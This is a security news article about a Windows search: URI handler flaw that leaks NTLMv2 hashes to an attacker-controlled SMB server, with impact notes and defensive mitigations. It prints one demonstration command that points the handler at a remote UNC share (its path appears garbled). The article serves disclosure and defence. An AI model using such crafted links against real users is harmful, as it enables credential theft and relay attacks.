In a recent development in network security, experts have unveiled a significant flaw in the Windows Search URI handler that risks exposing users’ NTLMv2 hashes. This newly identified vulnerability mirrors a previous issue with the Windows Snipping Tool, documented as CVE-2026-33829, which involved the ms-screensketch: URI handler and was resolved by Microsoft earlier this year.
This vulnerability, like CVE-2026-33829, can be exploited through the use of a crafted link embedded in web pages or emails. Should a user interact with such a link, their computer may connect to an SMB server controlled by an attacker, leading to the exposure of the NTLMv2 hash, a critical piece of information that can be exploited for unauthorized access.
Understanding the Search URI Handler Flaw
The identified issue lies within the search: URI handler. Similar to the Snipping Tool’s vulnerability, the search function fails to validate input parameters effectively. Instead of using “filePath,” the search URI uses “crumb=location:” to initiate requests to any UNC path specified, thereby triggering NTLM authentication and leaking the NTLMv2 hash.
A demonstration command, such as start "" "search:query=test&crumb=location:\10.0.1.100share", showcases how an attacker could exploit this flaw. This method of attack has been highlighted by security researcher Andrew Schwartz from Huntress, and shares the same moderate severity rating as its predecessor.
Potential Impact and Recommendations
The implications of this vulnerability are significant. By capturing the NTLMv2 hash, malicious actors could perform relay attacks, gaining further access to vulnerable networks. Despite the risks, Microsoft has declined to issue a patch, as it does not meet their criteria for critical severity issues. This decision leaves users at potential risk without a formal resolution.
To mitigate this threat, security professionals recommend blocking outbound SMB traffic (TCP/445 and TCP/139) on systems where it is unnecessary, enforcing SMB signing to prevent hash relay, and disabling NTLM authentication where feasible.
Future Considerations
The exposure of NTLMv2 hashes remains a pressing concern in network security, highlighting the need for robust defensive measures. Organizations are advised to remain vigilant and implement recommended security practices to protect against potential exploits. The cybersecurity community continues to advocate for more stringent criteria for vulnerability patches to ensure user safety.
As cybersecurity threats evolve, staying informed and proactive is essential in safeguarding digital environments. Continued research and responsible disclosure will play critical roles in addressing such vulnerabilities.
